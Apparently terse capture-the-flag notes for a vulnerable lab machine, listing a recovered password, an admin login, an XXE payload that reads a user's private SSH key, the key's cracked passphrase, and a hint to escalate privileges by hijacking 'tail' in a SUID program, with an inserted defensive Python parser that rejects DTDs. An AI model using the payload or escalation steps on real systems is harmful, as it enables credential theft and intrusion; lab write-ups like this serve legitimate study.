Scan
There is a bak under custom
The password is bulldog19

Log in on the other port with admin:bulldog19

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE comment [
<!ENTITY xxe SYSTEM "file:///home/barry/.ssh/id_rsa">
]>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>&xxe;</com>
</comment>

Actually it was obvious at a glance that this was XML; I didn't try it
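
A defensive counterpart to the payload above, as an added example that is not part of the original notes: a parser for the same <comment> format that refuses any document declaring a DOCTYPE or an entity, using Python's standard xml.parsers.expat. The names parse_comment and RejectedXML and both sample documents are constructed for illustration.

```python
import xml.parsers.expat

class RejectedXML(ValueError):
    """Raised when a submission declares a DTD or an entity."""

def parse_comment(data: bytes) -> dict:
    """Parse a <comment> submission; refuse any DOCTYPE or entity declaration."""
    fields, stack, text = {}, [], []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Fires on "<!DOCTYPE ...", before any entity could be expanded.
        raise RejectedXML("DOCTYPE declarations are not accepted")

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        raise RejectedXML(f"entity declaration {name!r} is not accepted")

    def on_start(name, attrs):
        stack.append(name)
        text.clear()

    def on_end(name):
        if len(stack) == 2:  # direct child of the root element
            fields[name] = "".join(text).strip()
        stack.pop()

    p = xml.parsers.expat.ParserCreate()
    p.StartDoctypeDeclHandler = on_doctype
    p.EntityDeclHandler = on_entity
    p.StartElementHandler = on_start
    p.CharacterDataHandler = text.append
    p.EndElementHandler = on_end
    p.Parse(data, True)  # exceptions raised in handlers propagate to the caller
    return fields

# Constructed sample inputs (not captured traffic).
BENIGN = (b'<?xml version="1.0" encoding="UTF-8"?>'
          b"<comment><name>Joe Hamd</name><author>Barry Clad</author>"
          b"<com>hello</com></comment>")
WITH_DTD = (b'<?xml version="1.0" encoding="UTF-8"?>'
            b'<!DOCTYPE comment [<!ENTITY xxe SYSTEM "file:///constructed/path">]>'
            b"<comment><name>a</name><author>b</author><com>&xxe;</com></comment>")

if __name__ == "__main__":
    print(parse_comment(BENIGN))
    try:
        parse_comment(WITH_DTD)
    except RejectedXML as exc:
        print("rejected:", exc)
```
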
Brute-force id_rsa
urieljames

Hijack the tail in the SUID program via environment variables